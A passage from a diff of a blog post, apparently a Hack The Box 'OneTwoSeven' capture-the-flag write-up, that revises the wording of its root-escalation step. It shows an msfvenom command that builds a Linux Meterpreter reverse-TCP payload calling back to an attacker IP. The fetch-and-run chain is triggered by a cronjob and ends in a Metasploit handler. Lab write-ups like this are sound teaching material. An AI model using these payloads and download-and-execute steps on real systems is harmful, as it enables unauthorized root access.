slemire/slemire.github.io/_posts/2019-08-31-htb-writeup-onetwoseven.md

 /tmp/met
 ```

-Then generate a Metepreter payload to connect back to me once it gets executed by the cronjob:
+Then I generate a Meterpreter payload to connect back to me when it gets executed by the cronjob:

 ```
 # msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o met LPORT=5555 LHOST=10.10.14.23
 ```

-And finally once the cronjob runs, downloads `snowscan.sh`, executes it and downloads the meterpreter binary, I get a shell as root:
+And finally once the cronjob runs, it downloads `snowscan.sh`, executes it and downloads the meterpreter binary so I can get a shell as root:

 ```
 msf5 exploit(multi/handler) > show options